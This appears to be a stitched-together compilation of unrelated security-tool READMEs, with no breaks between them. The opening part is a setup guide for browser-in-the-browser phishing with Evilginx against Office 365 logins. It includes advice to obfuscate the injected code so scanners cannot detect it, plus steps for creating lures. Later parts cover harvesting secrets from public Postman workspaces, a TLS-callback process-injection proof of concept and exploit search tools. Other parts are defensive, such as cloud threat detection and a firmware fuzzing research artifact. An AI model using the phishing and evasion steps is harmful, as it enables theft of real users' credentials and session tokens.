Note on Demo Obfuscation: As I explain in the walkthrough video, I included a minimal obfuscation for text content like URLs and titles of the BITB. You can open the demo obfuscator by opening demo-obfuscator.html
in your browser. In a real-world scenario, I would highly recommend that you obfuscate larger chunks of the HTML code injected or use JS tricks to avoid being detected and flagged. The advanced version I am working on will use a combination of advanced tricks to make it nearly impossible for scanners to fingerprint/detect the BITB code, so stay tuned.
Since we are running everything locally, we need to generate self-signed SSL certificates that will be used by Apache. Evilginx will not need the certs as we will be running it in developer mode.
We will use the domain fake.com
which will point to our local VM. If you want to use a different domain, make sure to change the domain in all files (Apache conf files, JS files, etc.)
Create dir and parents if they do not exist:
sudo mkdir -p /etc/ssl/localcerts/fake.com/
Generate the SSL certs using the OpenSSL config file:
sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
-keyout /etc/ssl/localcerts/fake.com/privkey.pem -out /etc/ssl/localcerts/fake.com/fullchain.pem \
-config openssl-local.cnf
Modify private key permissions:
sudo chmod 600 /etc/ssl/localcerts/fake.com/privkey.pem
Copy custom substitution files (the core of our approach):
sudo cp -r ./custom-subs /etc/apache2/custom-subs
Important Note: In this repo I have included 2 substitution configs, for Chrome on Mac and Chrome on Windows BITB. Both have auto-detection and styling for light/dark mode, and they should act as base templates for achieving the same for other browser/OS combos. Since I did not include automatic detection of the browser/OS combo used to visit our phishing page, you will have to use one of the two or implement your own logic for automatic switching.
Both config files under /apache-configs/
are the same, only with a different Include directive used for the substitution file that will be included. (there are 2 references for each file)
# Uncomment the one you want and remember to restart Apache after any changes:
#Include /etc/apache2/custom-subs/win-chrome.conf
Include /etc/apache2/custom-subs/mac-chrome.conf
Simply to make it easier, I included both versions as separate files for this next step.
Windows/Chrome BITB:
sudo cp ./apache-configs/win-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf
Mac/Chrome BITB:
sudo cp ./apache-configs/mac-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf
Test Apache configs to ensure there are no errors:
sudo apache2ctl configtest
Restart Apache to apply changes:
sudo systemctl restart apache2
Get the IP of the VM using ifconfig
and note it somewhere for the next step.
We now need to add new entries to our hosts file, to point the domain used in this demo fake.com
and all used subdomains to our VM on which Apache and Evilginx are running.
On Windows:
Open Notepad as Administrator (Search > Notepad > Right-Click > Run as Administrator)
Click on the File option (top-left) and in the File Explorer address bar, copy and paste the following:
C:\Windows\System32\drivers\etc\
Change the file types (bottom-right) to "All files".
Double-click the file named hosts
On Mac:
Open a terminal and run the following:
sudo nano /private/etc/hosts
Now modify the following records (replace [IP]
with the IP of your VM) then paste the records at the end of the hosts file:
# Local Apache and Evilginx Setup
[IP] login.fake.com
[IP] account.fake.com
[IP] sso.fake.com
[IP] www.fake.com
[IP] portal.fake.com
[IP] fake.com
# End of section
Save and exit.
Now restart your browser before moving to the next step.
Note: On Mac, use the following command to flush the DNS cache:
sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder
This demo is made with the provided Office 365 Enterprise phishlet. To get the host entries you need to add for a different phishlet, use phishlet get-hosts [PHISHLET_NAME]
but remember to replace the 127.0.0.1
with the actual local IP of your VM.
Since we are using self-signed SSL certificates, our browser will warn us every time we try to visit fake.com
so we need to make our host machine trust the certificate authority that signed the SSL certs.
For this step, it's easier to follow the video instructions, but here is the gist anyway.
Open https://fake.com/ in your Chrome browser.
Ignore the Unsafe Site warning and proceed to the page.
Click the SSL icon > Details > Export Certificate. IMPORTANT: When saving, the name MUST end with .crt for Windows to open it correctly.
Double-click it > Install for current user. Do NOT select automatic; instead, place the certificate in a specific store: select "Trusted Root Certification Authorities".
On Mac: to install for current user only > select "Keychain: login" AND click on "View Certificates" > details > trust > Always trust
Now RESTART your Browser
You should be able to visit https://fake.com
now and see the homepage without any SSL warnings.
At this point, everything should be ready so we can go ahead and start Evilginx, set up the phishlet, create our lure, and test it.
Optional: Install tmux (to keep evilginx running even if the terminal session is closed. Mainly useful when running on remote VM.)
sudo apt install tmux -y
Start Evilginx in developer mode (using tmux to avoid losing the session):
tmux new-session -s evilginx
cd ~/evilginx/
./evilginx -developer
(To re-attach to the tmux session use tmux attach-session -t evilginx
)
Evilginx Config:
config domain fake.com
config ipv4 127.0.0.1
IMPORTANT: Set Evilginx Blacklist mode to NoAdd to avoid blacklisting Apache since all requests will be coming from Apache and not the actual visitor IP.
blacklist noadd
Setup Phishlet and Lure:
phishlets hostname O365 fake.com
phishlets enable O365
lures create O365
lures get-url 0
Copy the lure URL and visit it from your browser (use Guest user on Chrome to avoid having to delete all saved/cached data between tests).
Original iframe-based BITB by @mrd0x: https://github.com/mrd0x/BITB
Evilginx Mastery Course by the creator of Evilginx @kgretzky: https://academy.breakdev.org/evilginx-mastery
My talk at BSides 2023: https://www.youtube.com/watch?v=p1opa2wnRvg
How to protect Evilginx using Cloudflare and HTML Obfuscation: https://www.jackphilipbutton.com/post/how-to-protect-evilginx-using-cloudflare-and-html-obfuscation
Evilginx resources for Microsoft 365 by @BakkerJan: https://janbakker.tech/evilginx-resources-for-microsoft-365/
This tool compilation is carefully crafted to be useful both for beginners and veterans of the malware analysis world. It has also proven useful for people trying their luck at the cracking underworld.
It's the ideal complement to be used with the manuals from the site, and to play with the numbered theories mirror.
To be clear, this pack aims to be the most complete and robust one available. Some of the pros are:
It contains all the basic (and not so basic) tools that you might need in a real life scenario, be it a simple or a complex one.
The pack is integrated with a Universal Updater that we made from scratch. Thanks to that, we get to maintain all the tools in an automated fashion.
It's really easy to expand and modify: you just have to update the file bin\updater\tools.ini
to integrate the tools you use to the updater, and then add the links for your tools to bin\sendto\sendto
, so they appear in the context menus.
The installer sets up everything we might need automatically - everything, from the dependencies to the environment variables, and it can even add a scheduled task to update the whole pack of tools weekly.
You can simply download the stable versions from the release section, where you can also find the installer.
Once downloaded, you can update the tools with the Universal Updater that we specifically developed for that sole purpose.
You will find the binary in the folder bin\updater\updater.exe
.
This toolkit is composed of 98 apps that cover everything we might need to perform reverse engineering and binary/malware analysis.
Every tool has been downloaded from its original/official website, but we still recommend using them with caution, especially those tools whose official pages are forum threads. Always exercise common sense.
You can check the complete list of tools here.
Pull Requests are welcome. If you want to propose big changes, you should first create an Issue about it, so we can all analyze and discuss it. The tools are compressed with 7-zip, and the format used for nomenclature is {name} - {version}.7z
Porch Pirate started as a tool to quickly uncover Postman secrets, and has slowly begun to evolve into a multi-purpose reconnaissance / OSINT framework for Postman. While existing tools are great proofs of concept, they only attempt to identify very specific keywords as "secrets", in very limited locations, with no consideration of recon beyond secrets. We realized we required capabilities that were "secret-agnostic", with enough flexibility to capture false positives that still provided offensive value.
Porch Pirate enumerates and presents sensitive results (global secrets, unique headers, endpoints, query parameters, authorization, etc), from publicly accessible Postman entities, such as:
python3 -m pip install porch-pirate
The Porch Pirate client can be used to nearly fully conduct reviews on public Postman entities in a quick and simple fashion. There are intended workflows and particular keywords to be used that can typically maximize results. These methodologies can be located on our blog: Plundering Postman with Porch Pirate.
Porch Pirate supports the following arguments to be performed on collections, workspaces, or users.
--globals
--collections
--requests
--urls
--dump
--raw
--curl
porch-pirate -s "coca-cola.com"
By default, Porch Pirate will display globals from all active and inactive environments if they are defined in the workspace. Provide a -w
argument with the workspace ID (found by performing a simple search, or automatic search dump) to extract the workspace's globals, along with other information.
porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8
When an interesting result has been found with a simple search, we can provide the workspace ID to the -w
argument with the --dump
command to begin extracting information from the workspace and its collections.
porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --dump
Porch Pirate can be supplied a simple search term, following the --globals
argument. Porch Pirate will dump all relevant workspaces tied to the results discovered in the simple search, but only if there are globals defined. This is particularly useful for quickly identifying potentially interesting workspaces to dig into further.
porch-pirate -s "shopify" --globals
Porch Pirate can be supplied a simple search term, following the --dump
argument. Porch Pirate will dump all relevant workspaces and collections tied to the results discovered in the simple search. This is particularly useful for quickly sifting through potentially interesting results.
porch-pirate -s "coca-cola.com" --dump
A particularly useful way to use Porch Pirate is to extract all URLs from a workspace and export them to another tool for fuzzing.
porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --urls
Porch Pirate will recursively extract all URLs from workspaces and their collections related to a simple search term.
porch-pirate -s "coca-cola.com" --urls
porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --collections
porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --requests
porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --raw
porch-pirate -w WORKSPACE_ID
porch-pirate -c COLLECTION_ID
porch-pirate -r REQUEST_ID
porch-pirate -u USERNAME/TEAMNAME
Porch Pirate can build curl requests when provided with a request ID for easier testing.
porch-pirate -r 11055256-b1529390-18d2-4dce-812f-ee4d33bffd38 --curl
porch-pirate -s coca-cola.com --proxy 127.0.0.1:8080
from porchpirate import porchpirate  # import assumed for the examples below

p = porchpirate()
print(p.search('coca-cola.com'))
p = porchpirate()
print(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
import json

from porchpirate import porchpirate

p = porchpirate()
collections = json.loads(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
for collection in collections['data']:
requests = collection['requests']
for r in requests:
request_data = p.request(r['id'])
print(request_data)
p = porchpirate()
print(p.workspace_globals('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
Other library usage examples can be located in the examples
directory, which contains the following examples:
dump_workspace.py
format_search_results.py
format_workspace_collections.py
format_workspace_globals.py
get_collection.py
get_collections.py
get_profile.py
get_request.py
get_statistics.py
get_team.py
get_user.py
get_workspace.py
recursive_globals_from_search.py
request_to_curl.py
search.py
search_by_page.py
workspace_collections.py
APKDeepLens is a Python based tool designed to scan Android applications (APK files) for security vulnerabilities. It specifically targets the OWASP Top 10 mobile vulnerabilities, providing an easy and efficient way for developers, penetration testers, and security researchers to assess the security posture of Android apps.
APKDeepLens is a Python-based tool that performs various operations on APK files. Its main features include:
To use APKDeepLens, you'll need to have Python 3.8 or higher installed on your system. You can then install APKDeepLens using the following command:
git clone https://github.com/d78ui98/APKDeepLens
cd APKDeepLens
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
python APKDeepLens.py --help
git clone https://github.com/d78ui98/APKDeepLens
cd APKDeepLens
python3 -m venv venv
.\venv\Scripts\activate
pip install -r .\requirements.txt
python APKDeepLens.py --help
To simply scan an APK, use the command below, specifying the APK file with the `-apk` argument. Once the scan is complete, a detailed report will be displayed in the console.
python3 APKDeepLens.py -apk file.apk
If you've already extracted the source code and want to provide its path for a faster scan, you can use the command below, specifying the Android application's source code with the `-source` parameter.
python3 APKDeepLens.py -apk file.apk -source <source-code-path>
To generate detailed PDF and HTML reports after the scan you can pass -report
argument as mentioned below.
python3 APKDeepLens.py -apk file.apk -report
We welcome contributions to the APKDeepLens project. If you have a feature request, bug report, or proposal, please open a new issue here.
For those interested in contributing code, please follow the standard GitHub process. We'll review your contributions as quickly as possible :)
New Module 34: TLS Callbacks For Anti-Debugging
New Module 35: Threadless Injection
The PoC follows these steps: it creates a target process (i.e. `RuntimeBroker.exe`) via the `CreateProcessViaWinAPIsW` function, then writes both the `g_FixedShellcode` shellcode and the main payload into it. The `g_FixedShellcode` shellcode will then make sure that the main payload executes only once by restoring the original TLS callback's address before calling the main payload. A TLS callback can execute multiple times across the lifespan of a process, therefore it is important to control the number of times the payload is triggered by restoring the original code path execution to the original TLS callback function.
The following image shows our implementation, RemoteTLSCallbackInjection.exe
, spawning a cmd.exe
as its main payload.
SiCat is an advanced exploit search tool designed to identify and gather information about exploits from both open sources and local repositories effectively. With a focus on cybersecurity, SiCat allows users to quickly search online, finding potential vulnerabilities and relevant exploits for ongoing projects or systems.
SiCat's main strength lies in its ability to traverse both online and local resources to collect information about relevant exploitations. This tool aids cybersecurity professionals and researchers in understanding potential security risks, providing valuable insights to enhance system security.
git clone https://github.com/justakazh/sicat.git && cd sicat
pip install -r requirements.txt
~$ python sicat.py --help
| Command | Description |
|---|---|
-h | Show help message and exit |
-k KEYWORD | Search keyword |
-kv KEYWORK_VERSION | Keyword version |
-nm | Identify via nmap output |
--nvd | Use NVD as info source |
--packetstorm | Use PacketStorm as info source |
--exploitdb | Use ExploitDB as info source |
--exploitalert | Use ExploitAlert as info source |
--msfmodule | Use Metasploit as info source |
-o OUTPUT | Path to save output to |
-ot OUTPUT_TYPE | Output file type: json or html |
From keyword
python sicat.py -k telerik --exploitdb --msfmodule
From nmap output
nmap --open -sV localhost -oX nmap_out.xml
python sicat.py -nm nmap_out.xml --packetstorm
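For reference, the `-nm` mode consumes standard `-oX` output; extracting the service and version keywords from such a file is straightforward (an independent sketch, not SiCat's own parser):

```python
import xml.etree.ElementTree as ET

def services_from_nmap(xml_path: str):
    """Yield (name, product, version) for open ports in nmap -oX output."""
    root = ET.parse(xml_path).getroot()
    for port in root.iter("port"):
        state = port.find("state")
        svc = port.find("service")
        if state is not None and state.get("state") == "open" and svc is not None:
            yield svc.get("name"), svc.get("product"), svc.get("version")

for name, product, version in services_from_nmap("nmap_out.xml"):
    print(name, product or "", version or "")
```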
I'm aware that perfection is elusive in coding. If you come across any bugs, feel free to contribute by fixing the code or suggesting new features. Your input is always welcomed and valued.
Permiso: https://permiso.io
Read our release blog: https://permiso.io/blog/cloudgrappler-a-powerful-open-source-threat-detection-tool-for-cloud-environments
CloudGrappler is a purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure.
To optimize your utilization of CloudGrappler, we recommend using shorter time ranges when querying for results. This approach enhances efficiency and accelerates the retrieval of information, ensuring a more seamless experience with the tool.
```bash
pip3 install -r requirements.txt
```
To clone the cloudgrep repository locally, run the clone.sh file. Alternatively, you can manually clone the repository into the same directory where CloudGrappler was cloned.
```bash
chmod +x clone.sh
./clone.sh
```
This tool offers a CLI (Command Line Interface). As such, here we review its use:
Define the scanning scope inside data_sources.json file based on your cloud infrastructure configuration. The following example showcases a structured data_sources.json file for both AWS and Azure environments:
Modifying the source inside the queries.json file to a wildcard character (*) will scan the corresponding query across both AWS and Azure environments.
{
"AWS": [
{
"bucket": "cloudtrail-logs-00000000-ffffff",
"prefix": [
"testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03",
"testTrails/AWSLogs/00000000/CloudTrail/us-west-1/2024/03/04"
]
},
{
"bucket": "aws-kosova-us-east-1-00000000"
}
],
"AZURE": [
{
"accountname": "logs",
"container": [
"cloudgrappler"
]
}
]
}
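Before a run, the scope file can be sanity-checked by loading it and printing what will be queried; a small sketch based on the structure above:

```python
import json

with open("data_sources.json") as fh:
    scope = json.load(fh)

for entry in scope.get("AWS", []):
    print("AWS bucket:", entry["bucket"],
          "prefixes:", entry.get("prefix", ["<all>"]))
for entry in scope.get("AZURE", []):
    print("Azure account:", entry["accountname"],
          "containers:", entry["container"])
```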
Run command
python3 main.py
python3 main.py -p
[+] Running GetFileDownloadUrls.*secrets_ for AWS
[+] Threat Actor: LUCR3
[+] Severity: MEDIUM
[+] Description: Review use of CloudShell. Permiso seldom witnesses use of CloudShell outside of known attackers. This, however, may be a part of your normal business use case.
python3 main.py -p -jo
reports
└── json
    ├── AWS
    │   └── 2024-03-04 01:01 AM
    │       └── cloudtrail-logs-00000000-ffffff--
    │           └── testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03
    │               └── GetFileDownloadUrls.*secrets_.json
    └── AZURE
        └── 2024-03-04 01:01 AM
            └── logs
                └── cloudgrappler
                    └── okta_key.json
python3 main.py -p -sd 2024-02-15 -ed 2024-02-16
python3 main.py -q "GetFileDownloadUrls.*secret", "UpdateAccessKey" -s '*'
python3 main.py -f new_file.json
Your system will need access to the S3 bucket. For example, if you are running on your laptop, you will need to configure the AWS CLI. If you are running on an EC2, an Instance Profile is likely the best choice.
If you run on an EC2 instance in the same region as the S3 bucket with a VPC endpoint for S3 you can avoid egress charges. You can authenticate in a number of ways.
The simplest way to authenticate with Azure is to first run:
az login
This will open a browser window and prompt you to login to Azure.
This is the companion code for the paper: 'Fuzzing Embedded Systems using Debugger Interfaces'. A preprint of the paper can be found here https://publications.cispa.saarland/3950/. The code allows the users to reproduce and extend the results reported in the paper. Please cite the above paper when reporting, reproducing or extending the results.
.
├── benchmark          # Scripts to build Google's fuzzer test suite and run experiments
├── dependencies       # Contains a Makefile to install dependencies for GDBFuzz
├── evaluation         # Raw experiment data, presented in the paper
├── example_firmware   # Embedded example applications, used for the evaluation
├── example_programs   # Contains a compiled example program and configs to test GDBFuzz
├── src                # Contains the implementation of GDBFuzz
├── Dockerfile         # For creating a Docker image with all GDBFuzz dependencies installed
├── LICENSE            # License
├── Makefile           # Makefile for creating the docker image or installing GDBFuzz locally
└── README.md          # This README file
The idea of GDBFuzz is to leverage hardware breakpoints from microcontrollers as feedback for coverage-guided fuzzing. Therefore, GDB is used as a generic interface to enable broad applicability. For binary analysis of the firmware, Ghidra is used. The code contains a benchmark setup for evaluating the method. Additionally, example firmware files are included.
GDBFuzz enables coverage-guided fuzzing for embedded systems, but - for evaluation purposes - can also fuzz arbitrary user applications. For fuzzing on microcontrollers we recommend a local installation of GDBFuzz to be able to send fuzz data to the device under test flawlessly.
GDBFuzz has been tested on Ubuntu 20.04 LTS and Raspberry Pi OS 32-bit. Prerequisites are Java and Python 3. First, create a new virtual environment and install all dependencies.
virtualenv .venv
source .venv/bin/activate
make
chmod a+x ./src/GDBFuzz/main.py
GDBFuzz reads settings from a config file with the following keys.
[SUT]
# Path to the binary file of the SUT.
# This can, for example, be an .elf file or a .bin file.
binary_file_path = <path>
# Address of the root node of the CFG.
# Breakpoints are placed at nodes of this CFG.
# e.g. 'LLVMFuzzerTestOneInput' or 'main'
entrypoint = <entrypoint>
# Number of inputs that must be executed without a breakpoint hit until
# breakpoints are rotated.
until_rotate_breakpoints = <number>
# Maximum number of breakpoints that can be placed at any given time.
max_breakpoints = <number>
# Blacklist functions that shall be ignored.
# ignore_functions is a space separated list of function names e.g. 'malloc free'.
ignore_functions = <space separated list>
# One of {Hardware, QEMU, SUTRunsOnHost}
# Hardware: An external component starts a gdb server and GDBFuzz can connect to this gdb server.
# QEMU: GDBFuzz starts QEMU. QEMU emulates binary_file_path and starts gdbserver.
# SUTRunsOnHost: GDBFuzz start the target program within GDB.
target_mode = <mode>
# Set this to False if you want to start ghidra, analyze the SUT,
# and start the ghidra bridge server manually.
start_ghidra = True
# Space separated list of addresses where software breakpoints (for error
# handling code) are set. Execution of those is considered a crash.
# Example: software_breakpoint_addresses = 0x123 0x432
software_breakpoint_addresses =
# Whether all triggered software breakpoints are considered as crash
consider_sw_breakpoint_as_error = False
[SUTConnection]
# The class 'SUT_connection_class' in file 'SUT_connection_path' implements
# how inputs are sent to the SUT.
# Inputs can, for example, be sent over Wi-Fi, Serial, Bluetooth, ...
# This class must inherit from ./connections/SUTConnection.py.
# See ./connections/SUTConnection.py for more information.
SUT_connection_file = FIFOConnection.py
[GDB]
path_to_gdb = gdb-multiarch
#Written in address:port
gdb_server_address = localhost:4242
[Fuzzer]
# In Bytes
maximum_input_length = 100000
# In seconds
single_run_timeout = 20
# In seconds
total_runtime = 3600
# Optional
# Path to a directory where each file contains one seed. If you don't want to
# use seeds, leave the value empty.
seeds_directory =
[BreakpointStrategy]
# Strategies to choose basic blocks are located in
# 'src/GDBFuzz/breakpoint_strategies/'
# For the paper we use the following strategies
# 'RandomBasicBlockStrategy.py' - Randomly choosing unreached basic blocks
# 'RandomBasicBlockNoDomStrategy.py' - Like previous, but doesn't use dominance relations to derive transitively reached nodes.
# 'RandomBasicBlockNoCorpusStrategy.py' - Like first, but prevents growing the input corpus and therefore behaves like blackbox fuzzing with coverage measurement.
# 'BlackboxStrategy.py', - Doesn't set any breakpoints
breakpoint_strategy_file = RandomBasicBlockStrategy.py
[Dependencies]
path_to_qemu = dependencies/qemu/build/x86_64-linux-user/qemu-x86_64
path_to_ghidra = dependencies/ghidra
[LogsAndVisualizations]
# One of {DEBUG, INFO, WARNING, ERROR, CRITICAL}
loglevel = INFO
# Path to a directory where output files (e.g. graphs, logfiles) are stored.
output_directory = ./output
# If set to True, an MQTT client sends UI elements (e.g. graphs)
enable_UI = False
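The settings use standard INI syntax, so a config can be inspected or generated with Python's configparser; a small sketch (independent of GDBFuzz's own loader):

```python
import configparser

cfg = configparser.ConfigParser()
cfg.read("./example_programs/fuzz_json.cfg")  # example config from the repo

# A few of the keys documented above.
print("SUT binary:  ", cfg["SUT"]["binary_file_path"])
print("Entrypoint:  ", cfg["SUT"]["entrypoint"])
print("Runtime (s): ", cfg["Fuzzer"]["total_runtime"])
```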
An example config file is located in ./example_programs/
together with an example program that was compiled using our fuzzing harness in benchmark/benchSUTs/GDBFuzz_wrapper/common/
. Start fuzzing for one hour with the following command.
chmod a+x ./example_programs/json-2017-02-12
./src/GDBFuzz/main.py --config ./example_programs/fuzz_json.cfg
We first see output from Ghidra analyzing the binary executable and subsequently messages when breakpoints are relocated or hit.
Depending on the specified output_directory
in the config file, there should now be a folder trial-0
with the following structure
.
├── corpus        # A folder that contains the input corpus.
├── crashes       # A folder that contains crashing inputs - if any.
├── cfg           # The control flow graph as adjacency list.
├── fuzzer_stats  # Statistics of the fuzzing campaign.
├── plot_data     # Table showing at which relative time in the fuzzing campaign which basic block was reached.
└── reverse_cfg   # The reverse control flow graph.
By setting start_ghidra = False
in the config file, GDBFuzz connects to a Ghidra instance running in GUI mode. Therefore, the ghidra_bridge plugin needs to be started manually from the script manager. During fuzzing, reached program blocks are highlighted in green.
For fuzzing Linux user applications, GDBFuzz leverages the standard `LLVMFuzzerTestOneInput` entrypoint that is used by almost all fuzzers like AFL, AFL++, and libFuzzer. In `benchmark/benchSUTs/GDBFuzz_wrapper/common` there is a wrapper that can be used to compile any compliant fuzz harness into a standalone program that fetches input via a named pipe at `/tmp/fromGDBFuzz`. This makes it possible to simulate an embedded device that consumes data via a well-defined input interface and therefore to run GDBFuzz on any application. For convenience we created a script in `benchmark/benchSUTs` that compiles all programs from our evaluation with our wrapper, as explained later.
NOTE: GDBFuzz is not intended to fuzz Linux user applications; use AFL++ or other fuzzers for that. The wrapper exists only for evaluation purposes, to enable running benchmarks and comparisons at scale!
The general effectiveness of our approach is shown in a large scale benchmark deployed as docker containers.
make dockerimage
To run the above experiment in the docker container (for one hour as specified in the config file), map the example_programs
and output
folder as volumes and start GDBFuzz as follows.
chmod a+x ./example_programs/json-2017-02-12
docker run -it --env CONFIG_FILE=/example_programs/fuzz_json_docker_qemu.cfg -v $(pwd)/example_programs:/example_programs -v $(pwd)/output:/output gdbfuzz:1.0
An output folder should appear in the current working directory with the structure explained above.
Our evaluation is split into two parts: 1. GDBFuzz on its intended setup, directly on the hardware. 2. GDBFuzz in an emulated environment, to allow independent analysis and comparison of the results.
GDBFuzz can work with any GDB server and therefore most debug probes for microcontrollers.
Regarding RQ1 from the paper, we execute GDBFuzz on different microcontrollers with different firmwares located in example_firmware
. For each experiment we run GDBFuzz with the RandomBasicBlock
and with the RandomBasicBlockNoCorpus
strategy. The latter behaves like fuzzing without feedback, but we can still measure the achieved coverage. For answering RQ1, we compare the achieved coverage of the RandomBasicBlock
and the RandomBasicBlockNoCorpus
strategy. Respective config files are in the corresponding subfolders and we now explain how to setup fuzzing on the four development boards.
GDBFuzz requires access to a GDB Server. In this case the B-L4S5I-IOT01A and its on-board debugger are used. This on-board debugger sets up a GDB server via the 'st-util' program, and enables access to this GDB server via localhost:4242.
sudo apt-get install stlink-tools gdb-multiarch
Build and flash a firmware for the STM32 B-L4S5I-IOT01A, for example the arduinojson project.
Prerequisite: Install platformio (pio)
cd ./example_firmware/stm32_disco_arduinojson/
pio run --target upload
For your info: platformio stored an .elf file of the SUT here: ./example_firmware/stm32_disco_arduinojson/.pio/build/disco_l4s5i_iot01a/firmware.elf
This .elf file is also later used in the user configuration for Ghidra.
Start a new terminal, and run the following to start a GDB server:
st-util
Run GDBFuzz with a user configuration for arduinojson. We can send data over the USB port to the microcontroller, which forwards this data via serial to the SUT. In our case /dev/ttyACM0 is the USB device of the microcontroller board. If your system assigned another device to the board, change /dev/ttyACM0 in the config file to your device.
./src/GDBFuzz/main.py --config ./example_firmware/stm32_disco_arduinojson/fuzz_serial_json.cfg
Fuzzer statistics and logs are in the ./output/... directory.
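For intuition, delivering one input over that serial device takes only a few lines of pyserial. A sketch; the 115200 baud rate is an assumption that must match your firmware:

```python
import serial  # pyserial

# Send one example input to the SUT over the USB serial device from the
# config. 115200 baud is an assumption; match your firmware's setting.
with serial.Serial("/dev/ttyACM0", 115200, timeout=1) as ser:
    ser.write(b'{"sensor": 42}')  # sample JSON input for the arduinojson SUT
    print(ser.read(64))           # read back any response from the board
```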
Install pyocd:
pip install --upgrade pip 'mbed-ls>=1.7.1' 'pyocd>=0.16'
Make sure that 'KitProg v3' is on the device and put the board into 'Arm DAPLink' mode by pressing the appropriate button. Start the GDB server:
pyocd gdbserver --persist
Flash a firmware and start fuzzing e.g. with
gdb-multiarch
target remote :3333
load ./example_firmware/CY8CKIT_json/mtb-example-psoc6-uart-transmit-receive.elf
monitor reset
./src/GDBFuzz/main.py --config ./example_firmware/CY8CKIT_json/fuzz_serial_json.cfg
Build and flash a firmware for the ESP32, for instance the arduinojson example with platformio.
cd ./example_firmware/esp32_arduinojson/
pio run --target upload
Add the following line to the OpenOCD config file for the J-Link debugger (jlink.cfg):
adapter speed 10000
Start a new terminal, and run the following to start the GDB Server:
get_idf
openocd -f interface/jlink.cfg -f target/esp32.cfg -c "telnet_port 7777" -c "gdb_port 8888"
Run GDBFuzz with a user configuration for arduinojson. We can send data over the USB port to the microcontroller, which forwards this data via serial to the SUT. In our case /dev/ttyUSB0 is the USB device of the microcontroller board. If your system assigned another device to the board, change /dev/ttyUSB0 in the config file to your device.
./src/GDBFuzz/main.py --config ./example_firmware/esp32_arduinojson/fuzz_serial.cfg
Fuzzer statistics and logs are in the ./output/... directory.
Install TI MSP430 GCC from https://www.ti.com/tool/MSP430-GCC-OPENSOURCE
Start the GDB server:
./gdb_agent_console libmsp430.so
or (more stable) build mspdebug from https://github.com/dlbeer/mspdebug/ and use:
until mspdebug --fet-skip-close --force-reset tilib "opt gdb_loop True" gdb ; do sleep 1 ; done
Ghidra fails to analyze binaries for the TI MSP430 controller out of the box. To fix that, we import the file in the Ghidra GUI, choose MSP430X as the architecture and skip the auto-analysis. Next, we open the 'Symbol Table', sort the symbols by name and delete all symbols with names like $C$L*. Now the auto-analysis can be executed. After analysis, start the ghidra bridge from the Ghidra GUI manually and then start GDBFuzz.
./src/GDBFuzz/main.py --config ./example_firmware/msp430_arduinojson/fuzz_serial.cfg
To access USB devices as a non-root user with pyusb, we add appropriate udev rules. Paste the following lines into /etc/udev/rules.d/50-myusb.rules:
SUBSYSTEM=="usb", ATTRS{idVendor}=="1234", ATTRS{idProduct}=="5678" GROUP="usbusers", MODE="666"
Reload udev:
sudo udevadm control --reload
sudo udevadm trigger
In RQ2 from the paper, we compare GDBFuzz against the emulation-based approach Fuzzware. First we execute GDBFuzz and Fuzzware as described previously on the shipped firmware files. For each GDBFuzz experiment, we create a file with the valid basic blocks from the control flow graph files as follows:
cut -d " " -f1 ./cfg > valid_bbs.txt
Now we can replay the coverage against the Fuzzware results:
fuzzware genstats --valid-bb-file valid_bbs.txt
When crashing or hanging inputs are found, they are stored in the crashes folder. During evaluation, we found the following three bugs:
GDBFuzz can also run on a Raspberry Pi host with slight modifications: in the file ./dependencies/ghidra/support/launch.sh (line 125), the JAVA_HOME variable must be hardcoded, e.g. to JAVA_HOME="/usr/lib/jvm/default-java".
To fuzz software on other boards, GDBFuzz requires an implementation of a connection (see src/GDBFuzz/connections) that triggers execution of the code at the entry point, e.g. a serial connection. All these properties need to be specified in the config file.
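As a shape sketch only: the class and method names below are hypothetical, and the real interface lives in src/GDBFuzz/connections; the point is that a connection needs one hook that delivers a generated input so execution reaches the entry point.

```python
import serial  # pyserial


class MySerialConnection:
    """Hypothetical sketch of a GDBFuzz SUT connection.

    Consult the implementations in src/GDBFuzz/connections for the real
    interface; connect() and send_input() here are illustrative names.
    """

    def connect(self, port: str = "/dev/ttyACM0", baud: int = 115200) -> None:
        # Open the channel to the board once, before fuzzing starts.
        self.ser = serial.Serial(port, baud, timeout=1)

    def send_input(self, data: bytes) -> None:
        # Deliver one fuzz input so the SUT executes the code at the
        # configured entry point.
        self.ser.write(data)
```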
For RQs 4-8 we run a large-scale benchmark. First, build the Docker image as described previously and compile applications from Google's Fuzzer Test Suite with our fuzzing harness in benchmark/benchSUTs/GDBFuzz_wrapper/common.
cd ./benchmark/benchSUTs
chmod a+x setup_benchmark_SUTs.py
make dockerbenchmarkimage
Next, adapt the benchmark settings in benchmark/scripts/benchmark.py and benchmark/scripts/benchmark_aflpp.py to your demands (especially number_of_cores, trials, and seconds_per_trial) and start the benchmark with:
cd ./benchmark/scripts
./benchmark.py $(pwd)/../benchSUTs/SUTs/ SUTs.json
./benchmark_aflpp.py $(pwd)/../benchSUTs/SUTs/ SUTs.json
A folder appears in ./benchmark/scripts that contains plot files (coverage over time), fuzzer statistics files, and control flow graph files for each experiment, as in evaluation/fuzzer_test_suite_qemu_runs.
GDBFuzz has an optional feature that plots the control flow graph of covered nodes. It is disabled by default. You can enable it by following the instructions in this section and setting enable_UI to True in the user configuration.
On the host:
Install graphviz:
sudo apt-get install graphviz
Install a recent version of node, for example via Option 2 from here (use Option 2, not Option 1); this installs both node and npm. For reference, our version numbers are as follows (newer versions should work too):
❯ node --version
v16.9.1
❯ npm --version
7.21.1
Install web UI dependencies:
cd ./src/webui
npm install
Install mosquitto MQTT broker, e.g. see here
